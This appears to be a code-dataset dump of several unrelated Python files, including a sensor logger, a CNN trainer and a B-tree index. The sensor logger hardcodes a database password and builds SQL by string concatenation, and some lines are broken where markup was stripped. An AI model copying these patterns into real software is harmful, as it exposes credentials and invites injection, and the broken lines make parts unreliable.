QtWidgets.QTableWidgetItem.__init__(self, text, QtWidgets.QTableWidgetItem.UserType)\n self.sort_key = sort_key\n\n def __lt__(self, other):\n if isinstance(self.sort_key, type(other.sort_key)):\n return self.sort_key < other.sort_key\n else:\n return str(self.sort_key) < str(other.sort_key)\n\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n wnd = OptimalTopologyWindow(None)\n sys.exit(app.exec_())\n","sub_path":"communication_networks/gui/optimal_topology_window.py","file_name":"optimal_topology_window.py","file_ext":"py","file_size_in_byte":9493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"67452245","text":"duration = int (input('Продолжительность в секундах: '))\nminute = 60\nhour = 3600\nday = 86400\nif duration duration:\n minute = duration // 60 % 60\n second = duration % 60\n print ('{} мин {} сек'.format(minute,second));\nelif duration >= hour and duration < day:\n day = duration // 86400\n hour = duration // 3600 % 24\n minute = duration // 60 % 60\n second = duration % 60\n print ('{} час {} мин {} сек'.format(hour,minute,second));\nelif duration >= day:\n day = duration // 86400\n hour = duration // 3600 % 24\n minute = duration // 60 % 60\n second = duration % 60\n print('{} дн {} час {} мин {} сек'.format(day, hour, minute, second));\n","sub_path":"stasevich_svyatoslav_dz_1_task_1.py","file_name":"stasevich_svyatoslav_dz_1_task_1.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"121080677","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n#this skript was designed to work with python2\nimport pymysql\nimport sys\nimport Adafruit_DHT\nimport datetime\nimport time\nimport logging\nimport logging.handlers\nimport socket\n\n#destination for the XML File\npath = '/var/www/html/xml/feucht.xml'\n#set up logging\nlogFormatter = logging.Formatter('%(asctime)s - %(levelname)s: %(message)s')\nrootLogger = logging.getLogger()\nfileHandler = logging.handlers.RotatingFileHandler('/var/log/dht/dht.log',maxBytes=1000000,backupCount=5)\nfileHandler.setFormatter(logFormatter)\nconsole = logging.StreamHandler()\nrootLogger.addHandler(fileHandler)\nrootLogger.addHandler(console)\nrootLogger.setLevel(logging.INFO)\n\n\n#DHT11 Inputs setzen\ndht11 = list()\nwith open('/home/pi/pinconfig/dht11.cfg', mode= 'r') as file:\n\tfor line in file:\n\t\tdht11 = line.split(',')\n\t\tlogging.info(\"DHT11 GPIOS are: \" + str(dht11))\n\n#DHT22 Inputs setzen\ndht22 = list()\nwith open('/home/pi/pinconfig/dht22.cfg', mode= 'r') as file:\n\tfor line in file:\n\t\tdht22 = line.split(',')\n\t\tlogging.info(\"DHT22 GPIOS are: \" + str(dht22))\n\n#find out local ip address (we want to tell the recievers the name of the system)\nlocal = (([ip for ip in socket.gethostbyname_ex(socket.gethostname())[2] if not ip.startswith(\"127.\")] or [[(s.connect((\"8.8.8.8\", 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]]) + [\"no IP found\"])[0]\n\n#header - figure out system name\nsql = \"select name from messsystem where ip = '%s';\" % (local)\ntry:\n\tdb = pymysql.connect(host='localhost', user='webuser', password='t5sLhtva6Ev8xjptFpGhu2zupsy64sgTndg',db='serverraum_temperaturueberwachung',autocommit=True)\n\tcursor = db.cursor()\n\tlogging.info(\"Connected to database\")\n\tlogging.debug(sql)\n\tcursor.execute(sql)\n\tsystemname = cursor.fetchone()[0]\n\tlogging.info(\"SystemName is: \" +systemname)\n\tdb.close()\nexcept Exception as e:\n\tlogging.error(e)\n\tsys.exit()\n\ndhtprefix = systemname.split(' ')[1] + systemname.split(' ')[2]\n\nwhile True:\n\t#connection stays open until an error\n\ttry:\n\t\tdb = pymysql.connect(host='localhost', user='webuser', password='t5sLhtva6Ev8xjptFpGhu2zupsy64sgTndg',db='serverraum_temperaturueberwachung',autocommit=True)\n\t\tcursor = db.cursor()\n\t\tlogging.info(\"Connected to database\")\n\texcept Exception as e:\n\t\tlogging.error(e)\n\t\tcontinue\n\twhile True:\n\t\t#connect to database\n\t\ttry:\n\t\t\tcursor.execute(\"select sensorKennung, sensorID, sensorPosition from sensor where fk_systemID = (select systemID from messsystem where ip = '\"+local+\"') order by sensorName;\")\n\t\t\tsensoren = cursor.fetchall()\n\t\t\tlogging.debug(sensoren)\n\t\t\t# read 1-wire slaves list\n\t\t\tsql = \"insert into messung (zeit , fk_sensorID, temp, feucht) values\"\n\t\t\tout = ''\n\t\t\tnow = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\t\t\tlogging.debug(\"beginning\")\n\t\t\t#save measurements to the database and produce xml, missing sensors will be created automatically\n\t\t\tfor pin in dht11:\n\t\t\t\tpin = int(pin)\n\t\t\t\tlogging.debug(\"reading GPIO: \" + str(pin))\n\t\t\t\tsk = 'dht'+ str(dhtprefix) + str(pin)\n\t\t\t\ttry:\n\t\t\t\t\tfeucht, temp = Adafruit_DHT.read_retry(Adafruit_DHT.DHT11, pin)\n\t\t\t\t\tsql = sql + \" ('%s',func_getSID('%s'), %d, %d),\" % (now, sk, temp, feucht)\n\t\t\t\t\tfor sensor in sensoren:\n\t\t\t\t\t\tif str(sensor[0]) == sk:\n\t\t\t\t\t\t\tlogging.debug(\"here\")\n\t\t\t\t\t\t\tout= out + ''+str(sensor[1])+''+str(temp)+''+str(feucht)+''+now+''\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tlogging.error(e)\n\t\t\tfor pin in dht22:\n\t\t\t\tpin = int(pin)\n\t\t\t\tlogging.debug(\"reading GPIO: \" + str(pin))\n\t\t\t\tsk = 'dht'+ str(dhtprefix) + str(pin)\n\t\t\t\ttry:\n\t\t\t\t\tfeucht, temp = Adafruit_DHT.read_retry(Adafruit_DHT.DHT22, pin)\n\t\t\t\t\tsql = sql + \" ('%s',func_getSID('%s'), %d, %d),\" % (now, sk, temp, feucht)\n\t\t\t\t\tfor sensor in sensoren:\n\t\t\t\t\t\tif str(sensor[0]) == sk:\n\t\t\t\t\t\t\tlogging.debug(\"here\")\n\t\t\t\t\t\t\tout= out + ''+str(sensor[1])+''+str(temp)+''+str(feucht)+''+now+''\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tlogging.error(e)\n\t\t\tout = out + \"\"\n\t\t\tlogging.debug(out)\n\t\t\twith open(path, \"w\") as xml:\n\t\t\t\txml.write(out)\n\t\t\tlogging.info(\"XML File sucessfully generated\")\n\t\t\tlogging.debug(sql[:-1] + \";\")\n\t\t\tcursor.execute(sql[:-1] + \";\")\n\t\t\tlogging.info(\"Data sucessfully inserted into database\")\n\t\t\t#wait for 60 seconds\n\t\t\ttime.sleep(5)\n\t\texcept Exception as g:\n\t\t\tlogging.error(g)\n\t\t\tlogging.info(\"Database Connection will be reopened\")\n\t\t\tdb.close()\n\t\t\tbreak","sub_path":"home/pi/skripts/readdht.py","file_name":"readdht.py","file_ext":"py","file_size_in_byte":4668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"394778835","text":"#!/usr/bin/env python3\n\"\"\"\nAuthor : Lee A. Congdon \nDate : 2021-09-02\nPurpose: Tiny Python Projects unscramble exercise\n\"\"\"\n\nfrom operator import pos\nimport os\nimport argparse\nimport re\n\n\ndef get_args():\n \"\"\"Parse arguments\"\"\"\n\n parser = argparse.ArgumentParser(\n description='Unscramble words',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('text',\n help='Input text or file',\n metavar='text')\n\n args = parser.parse_args()\n if os.path.isfile(args.text):\n args.text = open(args.text, \"r\", encoding=\"utf-8\").read()\n return args\n\n\ndef anagram(word):\n \"\"\"Return a list of word anagrams\"\"\"\n sorted_word = ''.join(sorted(word))\n entries = {}\n with open(\"./test_dictionary.txt\", \"r\", encoding='utf-8') as dictionary:\n for entry in dictionary.read().split():\n sorted_entry = ''.join(sorted(entry))\n if sorted_entry not in entries:\n entries[sorted_entry] = []\n entries[sorted_entry].append(entry)\n if sorted_word in entries:\n return entries[sorted_word]\n else:\n return []\n\n\ndef unscramble(word):\n \"\"\"Unscramble a word\"\"\"\n if len(word) > 3 and re.match(r'\\w+', word):\n for possible_word in anagram(word):\n if (possible_word[0] == word[0]) & (possible_word[-1] == word[-1]):\n word = possible_word\n\n return word\n\n\ndef main():\n \"\"\"Main program\"\"\"\n\n args = get_args()\n splitter = re.compile(r\"([a-zA-Z](?:[a-zA-Z']*[a-zA-Z])?)\")\n for line in args.text.splitlines():\n print(''.join(map(unscramble, splitter.split(line.rstrip()))))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"16_scrambler/unscramble.py","file_name":"unscramble.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"390167498","text":"import numpy as np\nfrom evol_proc import evol_proc\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('-b1', '--b1', type=float, default=2.0, help=\"The parameter of state 1\")\nparser.add_argument('-b2', '--b2', type=float, default=2.0, help=\"The parameter of state 2\")\nargs = parser.parse_args()\n\n\ndef get_evol_data():\n \"\"\"\n\n Returns:\n\n \"\"\"\n # setting up the objects and defining the parameters\n beta = 1; b2 = args.b2; c = 1; b1 = args.b1; n_gen = 10**4; n_it = 100\n # Vectors that store the cooperation rates for each scenario in each round\n coops = np.zeros((1, n_gen)).flatten()\n coop1 = np.zeros((1, n_gen)).flatten()\n coop2 = np.zeros((1, n_gen)).flatten()\n # Vectors that store the average frequency of each memory-1 strategy\n freqs = np.zeros((1, 2 ** 2)).flatten()\n freq1 = np.zeros((1, 2 ** 2)).flatten()\n freq2 = np.zeros((1, 2 ** 2)).flatten()\n # Define the transitions of the three scenarios\n # In each q, there three cases, 2 C (CC), 2 D (CD or DC), 2D (DD)\n qs = np.array([[0.9, 0.9, 0.1], [0.1, 0.1, 0.9]]) # the scenario that transition between state 1 and state 2\n #q1 = np.array([[0, 0, 0], [1, 1, 1]]) # only in the state 1\n #q2 = np.array([[1, 1, 1], [0, 0, 0]]) # only in the state 2\n # Vector with all possible one-shot payoffs\n pi_round = np.array([0, b1, -c, b1 - c, 0, b2, -c, b2 - c])\n\n for i in range(n_it): # run the evolution process with n_it initializations\n print(i)\n (coop, freq) = evol_proc(qs, pi_round, beta, n_gen)\n # print(coop.shape)\n # print(coop)\n # print(freq.shape)\n # print(freq)\n # get the average results_old of n_it initializations\n coops = i / (i + 1) * coops + 1 / (i + 1) * coop\n freqs = i / (i + 1) * freqs + 1 / (i + 1) * freq\n\n # (coop, freq) = evol_proc(q1, pi_round, beta, n_gen)\n # coop1 = i / (i + 1) * coop1 + 1 / (i + 1) * coop\n # freq1 = i / (i + 1) * freq1 + 1 / (i + 1) * freq\n #\n # (coop, freq) = evol_proc(q2, pi_round, beta, n_gen)\n # coop2 = i / (i + 1) * coop2 + 1 / (i + 1) * coop\n # freq2 = i / (i + 1) * freq2 + 1 / (i + 1) * freq\n\n coop = np.array([coops, coop1, coop2])\n freq = np.array([freqs, freq1, freq2])\n return (coop, freq)\n\n\ndef write_file(file_name, data_name):\n f = open(file_name, 'w')\n shape = data_name.shape\n for i in range(shape[0]):\n for j in range(shape[1]):\n if j < (shape[1] - 1):\n f.write(str(data_name[i][j]) + ',')\n else:\n f.write(str(data_name[i][j]))\n f.write('\\n')\n f.close()\n\n\nif __name__ == '__main__':\n coop_re, freq_re = get_evol_data()\n write_file('pri_coop_time.txt', coop_re)","sub_path":"stochastic_evolutionary_game/evolution_on_stochastic_game/pd_stochastic_game_new/get_evol_data.py","file_name":"get_evol_data.py","file_ext":"py","file_size_in_byte":2768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"450456968","text":"from io import BytesIO, TextIOWrapper\n\nINFO = ''\nINFO_CHECK = False\nBEGIN_MIG = 'BEGIN MIGRATION'\nEND_MIG = 'END MIGRATION'\n\nsql_file = 'sample.SQL'\nmigration_sql = TextIOWrapper(\n BytesIO(),\n line_buffering=True,\n encoding='utf-8',\n )\n\nwith open(sql_file) as fil:\n print(fil)\n for line in fil:\n if line.strip().upper() == BEGIN_MIG:\n INFO_CHECK = True\n continue\n if line.strip().upper() == END_MIG:\n INFO_CHECK = False\n continue\n if INFO_CHECK:\n INFO = INFO + line.strip() + ' ||| '\n else:\n migration_sql.write(line)\n","sub_path":"python/str_parser.py","file_name":"str_parser.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"397361903","text":"\"\"\"\nThis module implements training and evaluation of a Convolutional Neural Network in PyTorch.\nYou should fill in code into indicated sections.\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport numpy as np\nimport os\nfrom convnet_pytorch import ConvNet\nimport cifar10_utils\nimport matplotlib.pyplot as plt\n\nimport torch\nimport torch.nn as nn\n\n# Default constants\nLEARNING_RATE_DEFAULT = 1e-4\nBATCH_SIZE_DEFAULT = 32\nMAX_STEPS_DEFAULT = 5000\nEVAL_FREQ_DEFAULT = 500\nOPTIMIZER_DEFAULT = 'ADAM'\n\n# Directory in which cifar data is saved\nDATA_DIR_DEFAULT = './cifar10/cifar-10-batches-py'\n\nFLAGS = None\n\n\ndef accuracy(predictions, targets):\n \"\"\"\n Computes the prediction accuracy, i.e. the average of correct predictions\n of the network.\n \n Args:\n predictions: 2D float array of size [batch_size, n_classes]\n labels: 2D int array of size [batch_size, n_classes]\n with one-hot encoding. Ground truth labels for\n each sample in the batch\n Returns:\n accuracy: scalar float, the accuracy of predictions,\n i.e. the average correct predictions over the whole batch\n \n TODO:\n Implement accuracy computation.\n \"\"\"\n \n class_preds = torch.argmax(predictions, dim=1)\n correct_preds = (class_preds == targets).sum()\n accuracy = correct_preds.item() / predictions.shape[0]\n \n return accuracy\n\ndef eval(model, dataset, batch_size, device):\n model.eval()\n\n total_images = 0\n total_accuracy = 0\n num_batches = 0\n while total_images < dataset.num_examples:\n images, labels = dataset.next_batch(batch_size)\n\n # Convert to torch Tensor\n images = torch.from_numpy(images).to(device)\n labels = torch.from_numpy(labels).to(device)\n\n preds = model.forward(images)\n batch_accuracy = accuracy(preds, labels)\n \n total_accuracy += batch_accuracy\n total_images += batch_size\n num_batches += 1\n \n return total_accuracy/num_batches\n\ndef train():\n \"\"\"\n Performs training and evaluation of ConvNet model.\n \n TODO:\n Implement training and evaluation of ConvNet model. Evaluate your model on the whole test set each eval_freq iterations.\n \"\"\"\n \n ### DO NOT CHANGE SEEDS!\n # Set the random seeds for reproducibility\n np.random.seed(42)\n torch.manual_seed(42)\n\n ########################\n device = torch.device(\"cpu\") if not torch.cuda.is_available() else torch.device(\"cuda:0\")\n print(\"Using device\", device)\n\n def set_seed(seed):\n np.random.seed(seed)\n torch.manual_seed(seed)\n if torch.cuda.is_available(): # GPU operation have separate seed\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n set_seed(42)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n cifar10 = cifar10_utils.get_cifar10(data_dir=FLAGS.data_dir, one_hot=False, validation_size=0)\n train = cifar10[\"train\"]\n valid = cifar10[\"validation\"]\n test = cifar10[\"test\"]\n\n losses = []\n test_accuracies = []\n train_accuracies = []\n\n model = ConvNet(3, 10).to(device)\n loss_module = nn.CrossEntropyLoss()\n optimizer = torch.optim.Adam(model.parameters(), lr=FLAGS.learning_rate)\n \n step = 0 \n while step < FLAGS.max_steps:\n if step % FLAGS.eval_freq == 0: # Evaluate the model on the test dataset\n test_accuracy = eval(model, test, 100, device)\n test_accuracies.append(test_accuracy)\n print(f\"STEP {step} - {test_accuracy}\")\n \n model.train()\n images, labels = train.next_batch(FLAGS.batch_size)\n\n # Convert to torch Tensor\n images = torch.from_numpy(images).to(device)\n labels = torch.from_numpy(labels).to(device)\n\n preds = model(images)\n train_accuracies.append(accuracy(preds, labels))\n\n loss = loss_module(preds, labels)\n losses.append(loss.item())\n \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n step += 1\n \n test_accuracy = eval(model, test, 100, device)\n test_accuracies.append(test_accuracy)\n print(f\"STEP {step} - {test_accuracy}\")\n \n def moving_average(a, n=3):\n # Taken from https://stackoverflow.com/questions/14313510/how-to-calculate-moving-average-using-numpy\n ret = np.cumsum(a, dtype=float)\n ret[n:] = ret[n:] - ret[:-n]\n return ret[n - 1:] / n\n \n train_accuracies = moving_average(train_accuracies, n=100)\n\n fig, ax1 = plt.subplots()\n\n ax1.set_xlabel('Training iteration')\n ax1.set_ylabel('Loss')\n l1 = ax1.plot(range(len(losses)), losses, label=\"training loss\", color=\"b\", alpha=0.5, linewidth=1)\n\n ax2 = ax1.twinx()\n ax2.set_ylabel('Accuracy')\n l2 = ax2.plot(np.linspace(0, len(losses), len(test_accuracies)), test_accuracies, label=\"test accuracy\", color=\"r\")\n l3 = ax2.plot(np.linspace(0, len(losses), len(train_accuracies)), train_accuracies, label=\"train accuracy\", color=\"b\")\n\n plots = l1+l2+l3\n labels = [plot.get_label() for plot in plots]\n ax2.legend(plots, labels)\n\n plt.savefig(os.path.join(\"images\", \"cnn_loss_accuracy.png\"))\n plt.show()\n\n\ndef print_flags():\n \"\"\"\n Prints all entries in FLAGS variable.\n \"\"\"\n for key, value in vars(FLAGS).items():\n print(key + ' : ' + str(value))\n\n\ndef main():\n \"\"\"\n Main function\n \"\"\"\n # Print all Flags to confirm parameter settings\n print_flags()\n \n if not os.path.exists(FLAGS.data_dir):\n os.makedirs(FLAGS.data_dir)\n \n # Run the training operation\n train()\n\n\nif __name__ == '__main__':\n # Command line arguments\n parser = argparse.ArgumentParser()\n parser.add_argument('--learning_rate', type=float, default=LEARNING_RATE_DEFAULT,\n help='Learning rate')\n parser.add_argument('--max_steps', type=int, default=MAX_STEPS_DEFAULT,\n help='Number of steps to run trainer.')\n parser.add_argument('--batch_size', type=int, default=BATCH_SIZE_DEFAULT,\n help='Batch size to run trainer.')\n parser.add_argument('--eval_freq', type=int, default=EVAL_FREQ_DEFAULT,\n help='Frequency of evaluation on the test set')\n parser.add_argument('--data_dir', type=str, default=DATA_DIR_DEFAULT,\n help='Directory for storing input data')\n FLAGS, unparsed = parser.parse_known_args()\n \n main()\n","sub_path":"assignment_1/1_mlp_cnn/code/train_convnet_pytorch.py","file_name":"train_convnet_pytorch.py","file_ext":"py","file_size_in_byte":6577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"467243869","text":"import colors\nfrom operator import attrgetter\n\nTAMANHO_REGISTRO = 1506\nTAMANHO_BLOCO = 4096\n\nORDEM_PRIM = 170\nORDEM_SEC = 12\n\nclass Chave():\n\n def __init__(self, chave, ponteiro, ponteiro_no_menor = 0):\n self.chave = chave\n self.ponteiro_arquivo = int(ponteiro) # Posição do bloco no hash_table.data que contém a sel.chave\n self.ponteiro_no_menor = int(ponteiro_no_menor) # Posição do bloco onde está o nó que contém chaves menor que a\n # self.chave\n\n '''Gets & Sets'''\n def get_chave(self):\n return self.chave\n\n def get_ponteiro_arquivo(self):\n return self.ponteiro_arquivo\n\n def get_ponteiro_no_menor(self):\n return self.ponteiro_no_menor\n def set_ponteiro_no_menor(self, posicao):\n self.ponteiro_no_menor = int(posicao)\n\nclass No ():\n\n def __init__(self):\n self.qtd_chaves = int(0)\n self.chaves = []\n self.ponteiro_no_maior = int(0) # Posição do bloco onde está o nó que contém chaves maior que a\n # self.chave.\n '''Sabemos que a quantidade de ponteiros para bloco em um No é a quantidade de chaves + '. Como cada chave é\n responsável por mapear o No com chaves menores que ele, o ponteiro que fica faltando é para o No cujas chaves \n são maiores que a maior chave contida nesse No.'''\n\n self.ponteiro_pai = int(0) # Posição do bloco cujo No é pai do No atual\n ''' Não é comum fazer isso, mas vai simplificar muito na hora de fazer split. Não atrapalha também, pois são\n apenas 4 bytes no final para escrever e existe espaço para isso em ambas as árvores que estamos implementando.'''\n\n '''Gets & Sets'''\n def get_qtd_chaves(self):\n return self.qtd_chaves\n def set_qtd_chaves(self, qtd):\n self.qtd_chaves = qtd\n\n def get_qtd_max(self):\n return self.qtd_max\n def set_qtd_max(self, qtd):\n self.qtd_max = qtd\n\n def get_chaves(self):\n return self.chaves\n def limpa_chaves(self):\n self.chaves.clear()\n self.set_qtd_chaves(0)\n\n def insere_chave(self, chave):\n self.chaves.append(chave)\n self.qtd_chaves += 1\n self.chaves.sort(key=attrgetter(\"chave\"))\n\n def get_ponteiro_no_maior(self):\n return self.ponteiro_no_maior\n def set_ponteiro_no_maior(self, posicao):\n self.ponteiro_no_maior = int(posicao)\n\n def get_ponteiro_pai(self):\n return self.ponteiro_pai\n def set_ponteiro_pai(self, ponteiro):\n self.ponteiro_pai = ponteiro\n\n def get_chave_bytes(self):\n return self.tamanho_chave_bytes\n def set_chave_bytes(self, tamanho):\n self.tamanho_chave_bytes = tamanho\n\n\n def escreve_no (self, arquivo, qtd, tam):\n qtd_chaves_bin = int(self.qtd_chaves).to_bytes(4, byteorder=\"big\", signed=True)\n arquivo.write(qtd_chaves_bin)\n\n ponteiro_no_maior_bin = int(self.ponteiro_no_maior).to_bytes(4, byteorder=\"big\", signed=True)\n arquivo.write(ponteiro_no_maior_bin)\n\n ponteiro_pai_bin = int(self.ponteiro_pai).to_bytes(4, byteorder=\"big\", signed=True)\n arquivo.write(ponteiro_pai_bin)\n\n for j in range(qtd):\n if (j + 1) <= self.qtd_chaves:\n if tam > 4:\n titulo = self.chaves[j].chave.ljust(300, '\\x00')\n titulo = titulo.encode()\n titulo = titulo[:300]\n arquivo.write(titulo)\n else:\n aux = int(self.chaves[j].chave).to_bytes(tam, byteorder=\"big\", signed=True)\n arquivo.write(aux)\n\n aux = int(self.chaves[j].ponteiro_arquivo).to_bytes(4, byteorder=\"big\", signed=True)\n arquivo.write(aux)\n aux = int(self.chaves[j].ponteiro_no_menor).to_bytes(4, byteorder=\"big\", signed=True)\n arquivo.write(aux)\n\n else:\n nada = int(0).to_bytes(tam, byteorder=\"big\", signed=True)\n arquivo.write(nada)\n nada = int(0).to_bytes(4, byteorder=\"big\", signed=True)\n arquivo.write(nada)\n nada = int(0).to_bytes(4, byteorder=\"big\", signed=True)\n arquivo.write(nada)\n\n def le_no (self, qtd, tam, arquivo):\n no = No()\n\n qtd_chaves_bin = arquivo.read(4)\n qtd_chaves = int.from_bytes(qtd_chaves_bin, byteorder='big')\n no.set_qtd_chaves(qtd_chaves)\n\n ponteiro_no_maior_bin = arquivo.read(4)\n ponteiro = int.from_bytes(ponteiro_no_maior_bin, byteorder='big')\n no.set_ponteiro_no_maior(ponteiro)\n\n ponteiro_pai_bin = arquivo.read(4)\n ponteiro = int.from_bytes(ponteiro_pai_bin, byteorder='big')\n no.set_ponteiro_pai(ponteiro)\n\n for j in range(qtd_chaves):\n c = []\n if tam > 4:\n titulo = arquivo.read(tam)\n titulo = titulo.strip(b'\\x00')\n c.append(titulo)\n else:\n a = arquivo.read(tam)\n c.append(int.from_bytes(a, byteorder='big'))\n\n a = arquivo.read(4)\n c.append(int.from_bytes(a, byteorder='big'))\n\n a = arquivo.read(4)\n c.append(int.from_bytes(a, byteorder='big'))\n\n chave = Chave(c[0], c[1], c[2])\n no.chaves.append(chave)\n no.chaves.sort(key=attrgetter(\"chave\"))\n\n for i in range(no.qtd_chaves, qtd):\n t = tam +8\n nada = arquivo.read(t)\n\n return no\n\n\nclass ArvoreB ():\n\n def __init__(self, qtd_chaves_bloco):\n self.qtd_chaves_bloco = int(qtd_chaves_bloco)\n self.no_raiz = int(4096)\n\n def get_no_raiz (self):\n return self.no_raiz\n def set_no_raiz (self, no_raiz):\n self.no_raiz = int(no_raiz)\n\n def escreve_arvore(self, arquivo, qtd, tam):\n arvore_bin = [\n int(self.qtd_chaves_bloco).to_bytes(4, byteorder=\"big\", signed=True),\n int(self.no_raiz).to_bytes(4, byteorder=\"big\", signed=True)\n ]\n for a in arvore_bin: arquivo.write(a)\n\n arquivo.seek(4096, 0)\n no = No()\n no.escreve_no(arquivo, qtd, tam)\n\n def le_arvore(self, arquivo):\n linha = arquivo.read(8)\n aux1 = int.from_bytes(linha[:4], byteorder='big')\n aux2 = int.from_bytes(linha[4:], byteorder='big')\n arvore = ArvoreB(aux1)\n arvore.set_no_raiz(aux2)\n return arvore\n\ndef busca_id (chave, raiz, arquivo, hash, qtdblocos, qtd, tam):\n no = No()\n\n ponteiro = raiz\n arquivo.seek(ponteiro)\n no_aux = no.le_no(qtd, tam, arquivo)\n\n for i in range(no_aux.qtd_chaves):\n if chave == no_aux.chaves[i].chave:\n print(\"\\nChave \" + str(no_aux.chaves[i].chave) + \" já se encontra na árvore.\\n\")\n ponteiro_hash = no_aux.chaves[i].ponteiro_arquivo\n hash.seek(ponteiro_hash)\n r = hash.read(3012)\n registros = [r[:1506], r[1506:]]\n for registro in registros:\n id = int.from_bytes(registro[:4], byteorder='big')\n if id == chave:\n print(str(colors.darkgrey), end='')\n print('Id:', int.from_bytes(registro[:4], byteorder='big'))\n print('Titulo:', registro[4:304].decode().replace('\\x00', ''))\n print('Ano:', int.from_bytes(registro[304:308], byteorder='big'))\n print('Autores:', registro[308:458].decode().replace('\\x00', ''))\n print(\"Citações:\", int.from_bytes(registro[458:462], byteorder='big'))\n print(\"Data/Hora\", registro[462:482].decode().replace('\\x00', ''))\n print(\"Spinnet:\", registro[482:1506].decode().replace('\\x00', ''))\n print(str(colors.reset))\n print('\\n')\n print('Número de blocos lidos: ', qtdblocos)\n return\n\n for i in range(no_aux.qtd_chaves):\n if chave < no_aux.chaves[i].chave:\n if no_aux.chaves[i].ponteiro_no_menor == 0:\n print(\"\\nChave \" + str(chave) + \" não encontrada nesta árvore.\\n\")\n return False\n else:\n qtdblocos+=1\n return busca_id (chave, no_aux.chaves[i].ponteiro_no_menor, arquivo, hash, qtdblocos, qtd, tam)\n qtdblocos += 1\n return busca_id (chave, no_aux.ponteiro_no_maior, arquivo, hash, qtdblocos, qtd, tam)\n\ndef busca_titulo(chave, raiz, arquivo, hash, qtdblocos, qtd, tam):\n no = No()\n\n ponteiro = raiz\n arquivo.seek(ponteiro, 0)\n no_aux = no.le_no(qtd, tam, arquivo)\n\n for i in range(no_aux.qtd_chaves):\n if chave == no_aux.chaves[i].chave:\n print(\"\\nChave \" + str(no_aux.chaves[i].chave) + \" já se encontra na árvore.\\n\")\n ponteiro_hash = no_aux.chaves[i].ponteiro_arquivo * 4096\n hash.seek(ponteiro_hash)\n r = hash.read(3012)\n registros = [r[:1506], r[1506:]]\n for registro in registros:\n titulo = registro[4:304].strip(b'\\x00')\n\n if titulo == chave:\n print(str(colors.darkgrey), end='')\n print('Id:', int.from_bytes(registro[:4], byteorder='big'))\n print('Titulo:', registro[4:304].decode().replace('\\x00', ''))\n print('Ano:', int.from_bytes(registro[304:308], byteorder='big'))\n print('Autores:', registro[308:458].decode().replace('\\x00', ''))\n print(\"Citações:\", int.from_bytes(registro[458:462], byteorder='big'))\n print(\"Data/Hora\", registro[462:482].decode().replace('\\x00', ''))\n print(\"Spinnet:\", registro[482:1506].decode().replace('\\x00', ''))\n print(str(colors.reset))\n print('\\n')\n print('Número de blocos lidos: ', qtdblocos)\n return\n\n for i in range(no_aux.qtd_chaves):\n if chave < no_aux.chaves[i].chave:\n if no_aux.chaves[i].ponteiro_no_menor == 0:\n print(\"\\nChave \" + str(chave) + \" não encontrada nesta árvore.\\n\")\n return False\n else:\n qtdblocos+=1\n busca_titulo (chave, no_aux.chaves[i].ponteiro_no_menor, arquivo, hash, qtdblocos, qtd, tam)\n return\n qtdblocos += 1\n busca_titulo (chave, no_aux.ponteiro_no_maior, arquivo, hash, qtdblocos, qtd, tam)\n return\n\ndef split(no, ponteiro, arquivo, qtd, tam):\n chave_aux = None\n no_aux1 = No()\n no_aux2 = No()\n no_aux3 = No()\n\n if ponteiro == 4096:\n #resolver caso do no raiz\n for i in range(no.qtd_chaves):\n if i < (qtd) // 2:\n no_aux2.insere_chave(no.chaves[i])\n if i == (qtd) // 2:\n chave_aux = no.chaves[i]\n if i > (qtd) // 2:\n no_aux3.insere_chave(no.chaves[i])\n\n pos = arquivo.seek(0, 2)\n pos += 4\n chave_aux.set_ponteiro_no_menor(pos)\n\n arquivo.seek(pos)\n no_aux2.set_ponteiro_pai(ponteiro)\n no_aux2.escreve_no(arquivo, qtd, tam)\n\n pos = arquivo.seek(0, 2)\n pos += 4\n no_aux1.set_ponteiro_no_maior(pos)\n\n arquivo.seek(pos)\n no_aux3.set_ponteiro_pai(ponteiro)\n no_aux3.escreve_no(arquivo, qtd, tam)\n\n arquivo.seek(ponteiro)\n no_aux1.insere_chave(chave_aux)\n no_aux1.escreve_no(arquivo, qtd, tam)\n # print('Chave inserida na árvore com sucesso. SPLIIIIIIIIIITTTT')\n return\n\n for i in range(no.qtd_chaves):\n if i < (qtd) // 2:\n no_aux2.insere_chave(no.chaves[i])\n if i == (qtd) // 2:\n chave_aux = no.chaves[i]\n if i > (qtd) // 2:\n no_aux3.insere_chave(no.chaves[i])\n\n pos = arquivo.seek(ponteiro)\n chave_aux.set_ponteiro_no_menor(pos)\n no_aux2.set_ponteiro_pai(no.ponteiro_pai)\n no_aux2.escreve_no(arquivo, qtd, tam)\n\n arquivo.seek(0, 2)\n no_aux3.set_ponteiro_pai(no.ponteiro_pai)\n no_aux3.escreve_no(arquivo, qtd, tam)\n\n arquivo.seek(no.ponteiro_pai)\n no_aux1 = no_aux1.le_no(qtd, tam, arquivo)\n no_aux1.insere_chave(chave_aux)\n\n if 